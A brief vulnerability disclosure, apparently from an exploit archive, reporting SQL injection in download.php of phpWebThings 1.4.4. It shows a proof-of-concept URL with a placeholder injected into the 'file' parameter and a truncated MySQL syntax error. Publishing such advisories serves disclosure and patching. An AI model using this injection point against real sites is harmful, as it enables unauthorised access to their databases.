SQL injection in phpWebThing 1.4.4

Vulnerable: phpWebThings 1.4.4 website : http://phpwebthings.org The bug in download.php ThE Exploit : http://www.target.com/download.php?file=|SQL ThE Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'ord...